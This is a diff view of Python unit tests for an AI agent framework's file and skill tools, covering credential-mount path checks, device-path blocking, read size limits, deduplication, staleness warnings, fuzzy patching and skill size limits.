    def test_config_absolute_path_rejected(self, tmp_path, monkeypatch):
        """Absolute paths in config.yaml must be rejected."""
        hermes_home = tmp_path / ".hermes"
        hermes_home.mkdir()
        monkeypatch.setenv("HERMES_HOME", str(hermes_home))
        sensitive = tmp_path / "abs.json"
        sensitive.write_text("{}")
        self._write_config(hermes_home, [str(sensitive)])
        mounts = get_credential_file_mounts()
        assert mounts == []

    def test_config_legitimate_file_works(self, tmp_path, monkeypatch):
        """Normal files inside HERMES_HOME via config must still mount."""
        hermes_home = tmp_path / ".hermes"
        hermes_home.mkdir()
        monkeypatch.setenv("HERMES_HOME", str(hermes_home))
        (hermes_home / "oauth.json").write_text("{}")
        self._write_config(hermes_home, ["oauth.json"])
        mounts = get_credential_file_mounts()
        assert len(mounts) == 1
        assert "oauth.json" in mounts[0]["container_path"]

View File

@@ -593,7 +593,14 @@ class TestDelegationCredentialResolution(unittest.TestCase):
"model": "qwen2.5-coder",
"base_url": "http://localhost:1234/v1",
}
with patch.dict(os.environ, {"OPENROUTER_API_KEY": "env-openrouter-key"}, clear=False):
with patch.dict(
os.environ,
{
"OPENROUTER_API_KEY": "env-openrouter-key",
"OPENAI_API_KEY": "",
},
clear=False,
):
with self.assertRaises(ValueError) as ctx:
_resolve_delegation_credentials(cfg, parent)
self.assertIn("OPENAI_API_KEY", str(ctx.exception))

View File

@@ -0,0 +1,378 @@
#!/usr/bin/env python3
"""
Tests for read_file_tool safety guards: device-path blocking,
character-count limits, file deduplication, and dedup reset on
context compression.
Run with: python -m pytest tests/tools/test_file_read_guards.py -v
"""
import json
import os
import tempfile
import time
import unittest
from unittest.mock import patch, MagicMock
from tools.file_tools import (
read_file_tool,
clear_read_tracker,
reset_file_dedup,
_is_blocked_device,
_get_max_read_chars,
_DEFAULT_MAX_READ_CHARS,
)
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
class _FakeReadResult:
"""Minimal stand-in for FileOperations.read_file return value."""
def __init__(self, content="line1\nline2\n", total_lines=2, file_size=100):
self.content = content
self._total_lines = total_lines
self._file_size = file_size
def to_dict(self):
return {
"content": self.content,
"total_lines": self._total_lines,
"file_size": self._file_size,
}
def _make_fake_ops(content="hello\n", total_lines=1, file_size=6):
    """Return a MagicMock whose read_file yields a canned _FakeReadResult."""
    ops = MagicMock()

    def _read(path, offset=1, limit=500):
        # Ignore the arguments; always hand back the configured result.
        return _FakeReadResult(content=content, total_lines=total_lines, file_size=file_size)

    ops.read_file = _read
    return ops
# ---------------------------------------------------------------------------
# Device path blocking
# ---------------------------------------------------------------------------
class TestDevicePathBlocking(unittest.TestCase):
    """Paths like /dev/zero should be rejected before any I/O."""

    def test_blocked_device_detection(self):
        # Every infinite/interactive device must be refused.
        blocked = [
            "/dev/zero", "/dev/random", "/dev/urandom", "/dev/stdin",
            "/dev/tty", "/dev/console", "/dev/stdout", "/dev/stderr",
            "/dev/fd/0", "/dev/fd/1", "/dev/fd/2",
        ]
        for path in blocked:
            self.assertTrue(_is_blocked_device(path), f"{path} should be blocked")

    def test_safe_device_not_blocked(self):
        # /dev/null and ordinary block devices remain readable.
        for path in ("/dev/null", "/dev/sda1"):
            self.assertFalse(_is_blocked_device(path))

    def test_proc_fd_blocked(self):
        # stdin/stderr reached through procfs count as devices too.
        for path in ("/proc/self/fd/0", "/proc/12345/fd/2"):
            self.assertTrue(_is_blocked_device(path))

    def test_proc_fd_other_not_blocked(self):
        # fd numbers past 2 and other proc entries are allowed.
        self.assertFalse(_is_blocked_device("/proc/self/fd/3"))
        self.assertFalse(_is_blocked_device("/proc/self/maps"))

    def test_normal_files_not_blocked(self):
        for path in ("/tmp/test.py", "/home/user/.bashrc"):
            self.assertFalse(_is_blocked_device(path))

    def test_read_file_tool_rejects_device(self):
        """read_file_tool returns an error without any file I/O."""
        payload = json.loads(read_file_tool("/dev/zero", task_id="dev_test"))
        self.assertIn("error", payload)
        self.assertIn("device file", payload["error"])
# ---------------------------------------------------------------------------
# Character-count limits
# ---------------------------------------------------------------------------
class TestCharacterCountGuard(unittest.TestCase):
    """Large reads should be rejected with guidance to use offset/limit."""
    def setUp(self):
        clear_read_tracker()
    def tearDown(self):
        clear_read_tracker()
    # _get_max_read_chars is pinned so a developer's config override
    # cannot change this test's outcome.
    @patch("tools.file_tools._get_file_ops")
    @patch("tools.file_tools._get_max_read_chars", return_value=_DEFAULT_MAX_READ_CHARS)
    def test_oversized_read_rejected(self, _mock_limit, mock_ops):
        """A read that returns >max chars is rejected."""
        big_content = "x" * (_DEFAULT_MAX_READ_CHARS + 1)
        mock_ops.return_value = _make_fake_ops(
            content=big_content,
            total_lines=5000,
            file_size=len(big_content) + 100,  # bigger than content
        )
        result = json.loads(read_file_tool("/tmp/huge.txt", task_id="big"))
        # The error must steer the agent toward ranged reads, and still
        # report total_lines so the agent can pick a range.
        self.assertIn("error", result)
        self.assertIn("safety limit", result["error"])
        self.assertIn("offset and limit", result["error"])
        self.assertIn("total_lines", result)
    @patch("tools.file_tools._get_file_ops")
    def test_small_read_not_rejected(self, mock_ops):
        """Normal-sized reads pass through fine."""
        mock_ops.return_value = _make_fake_ops(content="short\n", file_size=6)
        result = json.loads(read_file_tool("/tmp/small.txt", task_id="small"))
        self.assertNotIn("error", result)
        self.assertIn("content", result)
    @patch("tools.file_tools._get_file_ops")
    @patch("tools.file_tools._get_max_read_chars", return_value=_DEFAULT_MAX_READ_CHARS)
    def test_content_under_limit_passes(self, _mock_limit, mock_ops):
        """Content just under the limit should pass through fine."""
        # Boundary case: limit - 1 characters must NOT trip the guard.
        mock_ops.return_value = _make_fake_ops(
            content="y" * (_DEFAULT_MAX_READ_CHARS - 1),
            file_size=_DEFAULT_MAX_READ_CHARS - 1,
        )
        result = json.loads(read_file_tool("/tmp/justunder.txt", task_id="under"))
        self.assertNotIn("error", result)
        self.assertIn("content", result)
# ---------------------------------------------------------------------------
# File deduplication
# ---------------------------------------------------------------------------
class TestFileDedup(unittest.TestCase):
    """Re-reading an unchanged file should return a lightweight stub."""
    def setUp(self):
        clear_read_tracker()
        # A real on-disk file is needed because dedup keys on mtime.
        self._tmpdir = tempfile.mkdtemp()
        self._tmpfile = os.path.join(self._tmpdir, "dedup_test.txt")
        with open(self._tmpfile, "w") as f:
            f.write("line one\nline two\n")
    def tearDown(self):
        clear_read_tracker()
        try:
            os.unlink(self._tmpfile)
            os.rmdir(self._tmpdir)
        except OSError:
            pass
    @patch("tools.file_tools._get_file_ops")
    def test_second_read_returns_dedup_stub(self, mock_ops):
        """Second read of same file+range returns dedup stub."""
        mock_ops.return_value = _make_fake_ops(
            content="line one\nline two\n", file_size=20,
        )
        # First read — full content, no dedup marker.
        r1 = json.loads(read_file_tool(self._tmpfile, task_id="dup"))
        self.assertNotIn("dedup", r1)
        # Second read — should get dedup stub mentioning the file is unchanged.
        r2 = json.loads(read_file_tool(self._tmpfile, task_id="dup"))
        self.assertTrue(r2.get("dedup"), "Second read should return dedup stub")
        self.assertIn("unchanged", r2.get("content", ""))
    @patch("tools.file_tools._get_file_ops")
    def test_modified_file_not_deduped(self, mock_ops):
        """After the file is modified, dedup returns full content."""
        mock_ops.return_value = _make_fake_ops(
            content="line one\nline two\n", file_size=20,
        )
        read_file_tool(self._tmpfile, task_id="mod")
        # Modify the file — the sleep ensures the mtime actually changes
        time.sleep(0.05)
        with open(self._tmpfile, "w") as f:
            f.write("changed content\n")
        r2 = json.loads(read_file_tool(self._tmpfile, task_id="mod"))
        self.assertNotEqual(r2.get("dedup"), True, "Modified file should not dedup")
    @patch("tools.file_tools._get_file_ops")
    def test_different_range_not_deduped(self, mock_ops):
        """Same file but different offset/limit should not dedup."""
        mock_ops.return_value = _make_fake_ops(
            content="line one\nline two\n", file_size=20,
        )
        read_file_tool(self._tmpfile, offset=1, limit=500, task_id="rng")
        # Different offset ⇒ different dedup key ⇒ full content again.
        r2 = json.loads(read_file_tool(
            self._tmpfile, offset=10, limit=500, task_id="rng",
        ))
        self.assertNotEqual(r2.get("dedup"), True)
    @patch("tools.file_tools._get_file_ops")
    def test_different_task_not_deduped(self, mock_ops):
        """Different task_ids have separate dedup caches."""
        mock_ops.return_value = _make_fake_ops(
            content="line one\nline two\n", file_size=20,
        )
        read_file_tool(self._tmpfile, task_id="task_a")
        r2 = json.loads(read_file_tool(self._tmpfile, task_id="task_b"))
        self.assertNotEqual(r2.get("dedup"), True)
# ---------------------------------------------------------------------------
# Dedup reset on compression
# ---------------------------------------------------------------------------
class TestDedupResetOnCompression(unittest.TestCase):
    """reset_file_dedup should clear the dedup cache so post-compression
    reads return full content."""
    def setUp(self):
        clear_read_tracker()
        self._tmpdir = tempfile.mkdtemp()
        self._tmpfile = os.path.join(self._tmpdir, "compress_test.txt")
        with open(self._tmpfile, "w") as f:
            f.write("original content\n")
    def tearDown(self):
        clear_read_tracker()
        try:
            os.unlink(self._tmpfile)
            os.rmdir(self._tmpdir)
        except OSError:
            pass
    @patch("tools.file_tools._get_file_ops")
    def test_reset_clears_dedup(self, mock_ops):
        """After reset_file_dedup, the same read returns full content."""
        mock_ops.return_value = _make_fake_ops(
            content="original content\n", file_size=18,
        )
        # First read — populates the dedup cache for this task.
        read_file_tool(self._tmpfile, task_id="comp")
        # Sanity check: dedup fires before the reset.
        r_dedup = json.loads(read_file_tool(self._tmpfile, task_id="comp"))
        self.assertTrue(r_dedup.get("dedup"), "Should dedup before reset")
        # Simulate context compression clearing the task's dedup cache.
        reset_file_dedup("comp")
        # Read again — must get full content, not the stub.
        r_post = json.loads(read_file_tool(self._tmpfile, task_id="comp"))
        self.assertNotEqual(r_post.get("dedup"), True,
                            "Post-compression read should return full content")
    @patch("tools.file_tools._get_file_ops")
    def test_reset_all_tasks(self, mock_ops):
        """reset_file_dedup(None) clears all tasks."""
        mock_ops.return_value = _make_fake_ops(
            content="original content\n", file_size=18,
        )
        read_file_tool(self._tmpfile, task_id="t1")
        read_file_tool(self._tmpfile, task_id="t2")
        reset_file_dedup()  # no task_id — clear all
        r1 = json.loads(read_file_tool(self._tmpfile, task_id="t1"))
        r2 = json.loads(read_file_tool(self._tmpfile, task_id="t2"))
        self.assertNotEqual(r1.get("dedup"), True)
        self.assertNotEqual(r2.get("dedup"), True)
    @patch("tools.file_tools._get_file_ops")
    def test_reset_preserves_loop_detection(self, mock_ops):
        """reset_file_dedup does NOT affect the consecutive-read counter."""
        mock_ops.return_value = _make_fake_ops(
            content="original content\n", file_size=18,
        )
        # Two reads: the first goes through the full path; the second is
        # answered from the dedup cache.
        read_file_tool(self._tmpfile, task_id="loop")
        read_file_tool(self._tmpfile, task_id="loop")
        reset_file_dedup("loop")
        # Third read after reset takes the full path again.  It must not be
        # blocked or warned: the deduped second read never drove the
        # consecutive-read counter toward the loop threshold.
        r3 = json.loads(read_file_tool(self._tmpfile, task_id="loop"))
        self.assertNotIn("error", r3)
# ---------------------------------------------------------------------------
# Large-file hint
# ---------------------------------------------------------------------------
class TestLargeFileHint(unittest.TestCase):
    """Large truncated files should include a hint about targeted reads."""
    def setUp(self):
        clear_read_tracker()
    def tearDown(self):
        clear_read_tracker()
    @patch("tools.file_tools._get_file_ops")
    def test_large_truncated_file_gets_hint(self, mock_ops):
        # Content stays small so the char guard passes, while the large
        # file_size plus truncated=True should trigger the hint.
        content = "line\n" * 400  # 2000 chars, small enough to pass char guard
        fake = _make_fake_ops(content=content, total_lines=10000, file_size=600_000)
        # Wrap the fake's read_file so its result's to_dict() reports
        # truncated=True (the fake result has no truncated flag of its own).
        orig_read = fake.read_file
        def patched_read(path, offset=1, limit=500):
            r = orig_read(path, offset, limit)
            orig_to_dict = r.to_dict
            def new_to_dict():
                d = orig_to_dict()
                d["truncated"] = True
                return d
            r.to_dict = new_to_dict
            return r
        fake.read_file = patched_read
        mock_ops.return_value = fake
        result = json.loads(read_file_tool("/tmp/bigfile.log", task_id="hint"))
        self.assertIn("_hint", result)
        self.assertIn("section you need", result["_hint"])
# ---------------------------------------------------------------------------
# Config override
# ---------------------------------------------------------------------------
class TestConfigOverride(unittest.TestCase):
    """file_read_max_chars in config.yaml should control the char guard."""
    def setUp(self):
        clear_read_tracker()
        # Reset the cached value so each test gets a fresh lookup
        import tools.file_tools as _ft
        _ft._max_read_chars_cached = None
    def tearDown(self):
        clear_read_tracker()
        import tools.file_tools as _ft
        _ft._max_read_chars_cached = None
    # NOTE(review): these tests patch load_config at its defining module
    # (hermes_cli.config) — this only takes effect if tools.file_tools
    # resolves load_config lazily through that module; confirm.
    @patch("tools.file_tools._get_file_ops")
    @patch("hermes_cli.config.load_config", return_value={"file_read_max_chars": 50})
    def test_custom_config_lowers_limit(self, _mock_cfg, mock_ops):
        """A config value of 50 should reject reads over 50 chars."""
        mock_ops.return_value = _make_fake_ops(content="x" * 60, file_size=60)
        result = json.loads(read_file_tool("/tmp/cfgtest.txt", task_id="cfg1"))
        self.assertIn("error", result)
        self.assertIn("safety limit", result["error"])
        self.assertIn("50", result["error"])  # should show the configured limit
    @patch("tools.file_tools._get_file_ops")
    @patch("hermes_cli.config.load_config", return_value={"file_read_max_chars": 500_000})
    def test_custom_config_raises_limit(self, _mock_cfg, mock_ops):
        """A config value of 500K should allow reads up to 500K chars."""
        # 200K chars would be rejected at the default 100K but passes at 500K
        mock_ops.return_value = _make_fake_ops(
            content="y" * 200_000, file_size=200_000,
        )
        result = json.loads(read_file_tool("/tmp/cfgtest2.txt", task_id="cfg2"))
        self.assertNotIn("error", result)
        self.assertIn("content", result)
# Allow running this module directly (python tests/...) as well as via pytest.
if __name__ == "__main__":
    unittest.main()

View File

@@ -0,0 +1,241 @@
#!/usr/bin/env python3
"""
Tests for file staleness detection in write_file and patch.
When a file is modified externally between the agent's read and write,
the write should include a warning so the agent can re-read and verify.
Run with: python -m pytest tests/tools/test_file_staleness.py -v
"""
import json
import os
import tempfile
import time
import unittest
from unittest.mock import patch, MagicMock
from tools.file_tools import (
read_file_tool,
write_file_tool,
patch_tool,
clear_read_tracker,
_check_file_staleness,
)
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
class _FakeReadResult:
def __init__(self, content="line1\nline2\n", total_lines=2, file_size=100):
self.content = content
self._total_lines = total_lines
self._file_size = file_size
def to_dict(self):
return {
"content": self.content,
"total_lines": self._total_lines,
"file_size": self._file_size,
}
class _FakeWriteResult:
def __init__(self):
self.bytes_written = 10
def to_dict(self):
return {"bytes_written": self.bytes_written}
class _FakePatchResult:
def __init__(self):
self.success = True
def to_dict(self):
return {"success": True, "diff": "--- a\n+++ b\n@@ ...\n"}
def _make_fake_ops(read_content="hello\n", file_size=6):
    """Build a MagicMock file-ops object backed by the fake result types."""
    ops = MagicMock()

    def _read(path, offset=1, limit=500):
        return _FakeReadResult(content=read_content, total_lines=1, file_size=file_size)

    ops.read_file = _read
    ops.write_file = lambda path, content: _FakeWriteResult()
    ops.patch_replace = lambda path, old, new, replace_all=False: _FakePatchResult()
    return ops
# ---------------------------------------------------------------------------
# Core staleness check
# ---------------------------------------------------------------------------
class TestStalenessCheck(unittest.TestCase):
    """write_file warns when the target changed after the task's last read."""
    def setUp(self):
        clear_read_tracker()
        # Staleness is mtime-based, so a real on-disk file is required.
        self._tmpdir = tempfile.mkdtemp()
        self._tmpfile = os.path.join(self._tmpdir, "stale_test.txt")
        with open(self._tmpfile, "w") as f:
            f.write("original content\n")
    def tearDown(self):
        clear_read_tracker()
        try:
            os.unlink(self._tmpfile)
            os.rmdir(self._tmpdir)
        except OSError:
            pass
    @patch("tools.file_tools._get_file_ops")
    def test_no_warning_when_file_unchanged(self, mock_ops):
        """Read then write with no external modification — no warning."""
        mock_ops.return_value = _make_fake_ops("original content\n", 18)
        read_file_tool(self._tmpfile, task_id="t1")
        result = json.loads(write_file_tool(self._tmpfile, "new content", task_id="t1"))
        self.assertNotIn("_warning", result)
    @patch("tools.file_tools._get_file_ops")
    def test_warning_when_file_modified_externally(self, mock_ops):
        """Read, then external modify, then write — should warn."""
        mock_ops.return_value = _make_fake_ops("original content\n", 18)
        read_file_tool(self._tmpfile, task_id="t1")
        # Simulate external modification; sleep so the mtime advances.
        time.sleep(0.05)
        with open(self._tmpfile, "w") as f:
            f.write("someone else changed this\n")
        result = json.loads(write_file_tool(self._tmpfile, "new content", task_id="t1"))
        self.assertIn("_warning", result)
        self.assertIn("modified since you last read", result["_warning"])
    @patch("tools.file_tools._get_file_ops")
    def test_no_warning_when_file_never_read(self, mock_ops):
        """Writing a file that was never read — no warning."""
        mock_ops.return_value = _make_fake_ops()
        result = json.loads(write_file_tool(self._tmpfile, "new content", task_id="t2"))
        self.assertNotIn("_warning", result)
    @patch("tools.file_tools._get_file_ops")
    def test_no_warning_for_new_file(self, mock_ops):
        """Creating a new file — no warning."""
        mock_ops.return_value = _make_fake_ops()
        new_path = os.path.join(self._tmpdir, "brand_new.txt")
        result = json.loads(write_file_tool(new_path, "content", task_id="t3"))
        self.assertNotIn("_warning", result)
        # Clean up so tearDown's rmdir does not fail on a non-empty dir.
        try:
            os.unlink(new_path)
        except OSError:
            pass
    @patch("tools.file_tools._get_file_ops")
    def test_different_task_isolated(self, mock_ops):
        """Task A reads, file changes, Task B writes — no warning for B."""
        mock_ops.return_value = _make_fake_ops("original content\n", 18)
        read_file_tool(self._tmpfile, task_id="task_a")
        time.sleep(0.05)
        with open(self._tmpfile, "w") as f:
            f.write("changed\n")
        result = json.loads(write_file_tool(self._tmpfile, "new", task_id="task_b"))
        self.assertNotIn("_warning", result)
# ---------------------------------------------------------------------------
# Staleness in patch
# ---------------------------------------------------------------------------
class TestPatchStaleness(unittest.TestCase):
    """patch_tool performs the same staleness check as write_file."""
    def setUp(self):
        clear_read_tracker()
        self._tmpdir = tempfile.mkdtemp()
        self._tmpfile = os.path.join(self._tmpdir, "patch_test.txt")
        with open(self._tmpfile, "w") as f:
            f.write("original line\n")
    def tearDown(self):
        clear_read_tracker()
        try:
            os.unlink(self._tmpfile)
            os.rmdir(self._tmpdir)
        except OSError:
            pass
    @patch("tools.file_tools._get_file_ops")
    def test_patch_warns_on_stale_file(self, mock_ops):
        """Patch should warn if the target file changed since last read."""
        mock_ops.return_value = _make_fake_ops("original line\n", 15)
        read_file_tool(self._tmpfile, task_id="p1")
        # External modification; sleep so the mtime advances first.
        time.sleep(0.05)
        with open(self._tmpfile, "w") as f:
            f.write("externally modified\n")
        result = json.loads(patch_tool(
            mode="replace", path=self._tmpfile,
            old_string="original", new_string="patched",
            task_id="p1",
        ))
        self.assertIn("_warning", result)
        self.assertIn("modified since you last read", result["_warning"])
    @patch("tools.file_tools._get_file_ops")
    def test_patch_no_warning_when_fresh(self, mock_ops):
        """Patch with no external changes — no warning."""
        mock_ops.return_value = _make_fake_ops("original line\n", 15)
        read_file_tool(self._tmpfile, task_id="p2")
        result = json.loads(patch_tool(
            mode="replace", path=self._tmpfile,
            old_string="original", new_string="patched",
            task_id="p2",
        ))
        self.assertNotIn("_warning", result)
# ---------------------------------------------------------------------------
# Unit test for the helper
# ---------------------------------------------------------------------------
class TestCheckFileStalenessHelper(unittest.TestCase):
    """Direct unit tests for the _check_file_staleness helper."""

    def setUp(self):
        clear_read_tracker()

    def tearDown(self):
        clear_read_tracker()

    @staticmethod
    def _seed_tracker(timestamps):
        # Install a tracker entry for task "t1" with the given read timestamps.
        from tools.file_tools import _read_tracker, _read_tracker_lock
        entry = {
            "last_key": None,
            "consecutive": 0,
            "read_history": set(),
            "dedup": {},
            "read_timestamps": timestamps,
        }
        with _read_tracker_lock:
            _read_tracker["t1"] = entry

    def test_returns_none_for_unknown_task(self):
        # No tracker entry exists for this task id at all.
        self.assertIsNone(_check_file_staleness("/tmp/x.py", "nonexistent"))

    def test_returns_none_for_unread_file(self):
        # The task has read a *different* file, so no staleness verdict.
        self._seed_tracker({"/tmp/other.py": 12345.0})
        self.assertIsNone(_check_file_staleness("/tmp/x.py", "t1"))

    def test_returns_none_when_stat_fails(self):
        # File doesn't exist → stat fails → returns None (let write handle it)
        self._seed_tracker({"/nonexistent/path": 99999.0})
        self.assertIsNone(_check_file_staleness("/nonexistent/path", "t1"))
# Allow running this module directly (python tests/...) as well as via pytest.
if __name__ == "__main__":
    unittest.main()

View File

@@ -0,0 +1,174 @@
"""Tests for skill fuzzy patching via tools.fuzzy_match."""
import json
import os
from pathlib import Path
from unittest.mock import patch
import pytest
from tools.skill_manager_tool import (
_create_skill,
_patch_skill,
_write_file,
skill_manage,
)
# Shared fixture: a minimal valid SKILL.md — YAML frontmatter (name +
# description) followed by a body with three distinct, patchable step lines.
SKILL_CONTENT = """\
---
name: test-skill
description: A test skill for unit testing.
---
# Test Skill
Step 1: Do the thing.
Step 2: Do another thing.
Step 3: Final step.
"""
# ---------------------------------------------------------------------------
# Fuzzy patching
# ---------------------------------------------------------------------------
class TestFuzzyPatchSkill:
    """_patch_skill should locate targets via tools.fuzzy_match fallbacks."""
    @pytest.fixture(autouse=True)
    def setup_skills(self, tmp_path, monkeypatch):
        # Sandbox SKILLS_DIR and HERMES_HOME into the test's temp tree.
        skills_dir = tmp_path / "skills"
        skills_dir.mkdir()
        monkeypatch.setattr("tools.skill_manager_tool.SKILLS_DIR", skills_dir)
        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
        self.skills_dir = skills_dir
    def test_exact_match_still_works(self):
        # Fuzzy support must not break plain exact-string patching.
        _create_skill("test-skill", SKILL_CONTENT)
        result = _patch_skill("test-skill", "Step 1: Do the thing.", "Step 1: Done!")
        assert result["success"] is True
        content = (self.skills_dir / "test-skill" / "SKILL.md").read_text()
        assert "Step 1: Done!" in content
    def test_whitespace_trimmed_match(self):
        """Patch with extra leading whitespace should still find the target."""
        skill = """\
---
name: ws-skill
description: Whitespace test
---
# Commands
    def hello():
        print("hi")
"""
        _create_skill("ws-skill", skill)
        # Agent sends patch with no leading whitespace (common LLM behaviour)
        result = _patch_skill("ws-skill", "def hello():\n    print(\"hi\")", "def hello():\n    print(\"hello world\")")
        assert result["success"] is True
        content = (self.skills_dir / "ws-skill" / "SKILL.md").read_text()
        assert 'print("hello world")' in content
    def test_indentation_flexible_match(self):
        """Patch where only indentation differs should succeed."""
        skill = """\
---
name: indent-skill
description: Indentation test
---
# Steps
  1. First step
  2. Second step
  3. Third step
"""
        _create_skill("indent-skill", skill)
        # Agent sends with different indentation
        result = _patch_skill(
            "indent-skill",
            "1. First step\n2. Second step",
            "1. Updated first\n2. Updated second"
        )
        assert result["success"] is True
        content = (self.skills_dir / "indent-skill" / "SKILL.md").read_text()
        assert "Updated first" in content
    def test_multiple_matches_blocked_without_replace_all(self):
        """Multiple fuzzy matches should return an error without replace_all."""
        skill = """\
---
name: dup-skill
description: Duplicate test
---
# Steps
word word word
"""
        _create_skill("dup-skill", skill)
        result = _patch_skill("dup-skill", "word", "replaced")
        assert result["success"] is False
        assert "match" in result["error"].lower()
    def test_replace_all_with_fuzzy(self):
        # With replace_all, every occurrence is rewritten.
        skill = """\
---
name: dup-skill
description: Duplicate test
---
# Steps
word word word
"""
        _create_skill("dup-skill", skill)
        result = _patch_skill("dup-skill", "word", "replaced", replace_all=True)
        assert result["success"] is True
        content = (self.skills_dir / "dup-skill" / "SKILL.md").read_text()
        assert "word" not in content
        assert "replaced" in content
    def test_no_match_returns_preview(self):
        # A hopeless target should fail and include a preview to help the agent.
        _create_skill("test-skill", SKILL_CONTENT)
        result = _patch_skill("test-skill", "this does not exist anywhere", "replacement")
        assert result["success"] is False
        assert "file_preview" in result
    def test_fuzzy_patch_on_supporting_file(self):
        """Fuzzy matching should also work on supporting files."""
        _create_skill("test-skill", SKILL_CONTENT)
        ref_content = "    function hello() {\n        console.log('hi');\n    }"
        _write_file("test-skill", "references/code.js", ref_content)
        # Patch with stripped indentation
        result = _patch_skill(
            "test-skill",
            "function hello() {\nconsole.log('hi');\n}",
            "function hello() {\nconsole.log('hello world');\n}",
            file_path="references/code.js"
        )
        assert result["success"] is True
        content = (self.skills_dir / "test-skill" / "references" / "code.js").read_text()
        assert "hello world" in content
    def test_patch_preserves_frontmatter_validation(self):
        """Fuzzy matching should still run frontmatter validation on SKILL.md."""
        _create_skill("test-skill", SKILL_CONTENT)
        # Try to destroy the frontmatter via patch
        result = _patch_skill("test-skill", "---\nname: test-skill", "BROKEN")
        assert result["success"] is False
        assert "structure" in result["error"].lower() or "frontmatter" in result["error"].lower()
    def test_skill_manage_patch_uses_fuzzy(self):
        """The dispatcher should route to the fuzzy-matching patch."""
        _create_skill("test-skill", SKILL_CONTENT)
        raw = skill_manage(
            action="patch",
            name="test-skill",
            old_string=" Step 1: Do the thing.",  # extra leading space
            new_string="Step 1: Updated.",
        )
        result = json.loads(raw)
        # Should succeed via line-trimmed or indentation-flexible matching
        assert result["success"] is True

View File

@@ -271,7 +271,7 @@ class TestPatchSkill:
_create_skill("my-skill", VALID_SKILL_CONTENT)
result = _patch_skill("my-skill", "this text does not exist", "replacement")
assert result["success"] is False
assert "not found" in result["error"]
assert "not found" in result["error"].lower() or "could not find" in result["error"].lower()
def test_patch_ambiguous_match_rejected(self, tmp_path):
content = """\
@@ -288,7 +288,7 @@ word word
_create_skill("my-skill", content)
result = _patch_skill("my-skill", "word", "replaced")
assert result["success"] is False
assert "matched" in result["error"]
assert "match" in result["error"].lower()
def test_patch_replace_all(self, tmp_path):
content = """\

View File

@@ -0,0 +1,215 @@
"""Tests for skill content size limits.
Agent writes (create/edit/patch/write_file) are constrained to
MAX_SKILL_CONTENT_CHARS (100k) and MAX_SKILL_FILE_BYTES (1 MiB).
Hand-placed and hub-installed skills have no hard limit.
"""
import json
import os
from pathlib import Path
from unittest.mock import patch
import pytest
from tools.skill_manager_tool import (
MAX_SKILL_CONTENT_CHARS,
MAX_SKILL_FILE_BYTES,
_validate_content_size,
skill_manage,
)
@pytest.fixture(autouse=True)
def isolate_skills(tmp_path, monkeypatch):
    """Redirect SKILLS_DIR to a temp directory."""
    sandbox = tmp_path / "skills"
    sandbox.mkdir()
    # Point both modules that hold a SKILLS_DIR reference at the sandbox,
    # and keep HERMES_HOME inside the test's temp tree too.
    monkeypatch.setenv("HERMES_HOME", str(tmp_path))
    monkeypatch.setattr("tools.skill_manager_tool.SKILLS_DIR", sandbox)
    monkeypatch.setattr("tools.skills_tool.SKILLS_DIR", sandbox)
    return sandbox
def _make_skill_content(body_chars: int) -> str:
"""Generate valid SKILL.md content with a body of the given character count."""
frontmatter = (
"---\n"
"name: test-skill\n"
"description: A test skill\n"
"---\n"
)
body = "# Test Skill\n\n" + ("x" * max(0, body_chars - 15))
return frontmatter + body
class TestValidateContentSize:
    """Behavioral checks for the _validate_content_size helper."""

    def test_within_limit(self):
        # Comfortably small content → no error message.
        assert _validate_content_size("a" * 1000) is None

    def test_at_limit(self):
        # Exactly the maximum is still allowed (inclusive bound).
        content = "a" * MAX_SKILL_CONTENT_CHARS
        assert _validate_content_size(content) is None

    def test_over_limit(self):
        # One char past the limit produces an error naming both sizes.
        oversized = "a" * (MAX_SKILL_CONTENT_CHARS + 1)
        err = _validate_content_size(oversized)
        assert err is not None
        for expected in ("100,001", "100,000"):
            assert expected in err

    def test_custom_label(self):
        # The label identifies which file tripped the limit.
        oversized = "a" * (MAX_SKILL_CONTENT_CHARS + 1)
        err = _validate_content_size(oversized, label="references/api.md")
        assert "references/api.md" in err
class TestCreateSkillSizeLimit:
    """create action rejects oversized content."""
    def test_create_within_limit(self, isolate_skills):
        content = _make_skill_content(5000)
        result = json.loads(skill_manage(action="create", name="small-skill", content=content))
        assert result["success"] is True
    def test_create_over_limit(self, isolate_skills):
        content = _make_skill_content(MAX_SKILL_CONTENT_CHARS + 100)
        result = json.loads(skill_manage(action="create", name="huge-skill", content=content))
        assert result["success"] is False
        assert "100,000" in result["error"]
    def test_create_at_limit(self, isolate_skills):
        # Content at exactly the limit should succeed — the body budget is
        # computed from the frontmatter length so the total is exact.
        frontmatter = "---\nname: edge-skill\ndescription: Edge case\n---\n# Edge\n\n"
        body_budget = MAX_SKILL_CONTENT_CHARS - len(frontmatter)
        content = frontmatter + ("x" * body_budget)
        assert len(content) == MAX_SKILL_CONTENT_CHARS
        result = json.loads(skill_manage(action="create", name="edge-skill", content=content))
        assert result["success"] is True
class TestEditSkillSizeLimit:
    """edit action rejects oversized content."""
    def test_edit_over_limit(self, isolate_skills):
        # Create a small skill first
        small = _make_skill_content(1000)
        json.loads(skill_manage(action="create", name="grow-me", content=small))
        # Try to edit it to be oversized
        big = _make_skill_content(MAX_SKILL_CONTENT_CHARS + 100)
        # Fix the name in frontmatter so the edit targets the same skill.
        big = big.replace("name: test-skill", "name: grow-me")
        result = json.loads(skill_manage(action="edit", name="grow-me", content=big))
        assert result["success"] is False
        assert "100,000" in result["error"]
class TestPatchSkillSizeLimit:
    """patch action checks resulting size, not just the new_string."""
    def test_patch_that_would_exceed_limit(self, isolate_skills):
        # Create a skill near the limit (_make_skill_content(n) totals n + 50
        # characters, so this lands exactly at MAX_SKILL_CONTENT_CHARS).
        near_limit = _make_skill_content(MAX_SKILL_CONTENT_CHARS - 50)
        json.loads(skill_manage(action="create", name="near-limit", content=near_limit))
        # Patch that adds enough to go over
        result = json.loads(skill_manage(
            action="patch",
            name="near-limit",
            old_string="# Test Skill",
            new_string="# Test Skill\n" + ("y" * 200),
        ))
        assert result["success"] is False
        assert "100,000" in result["error"]
    def test_patch_that_reduces_size_on_oversized_skill(self, isolate_skills, tmp_path):
        """Patches that shrink an already-oversized skill should succeed."""
        # Manually create an oversized skill (simulating hand-placed)
        skill_dir = tmp_path / "skills" / "bloated"
        skill_dir.mkdir(parents=True)
        oversized = _make_skill_content(MAX_SKILL_CONTENT_CHARS + 5000)
        oversized = oversized.replace("name: test-skill", "name: bloated")
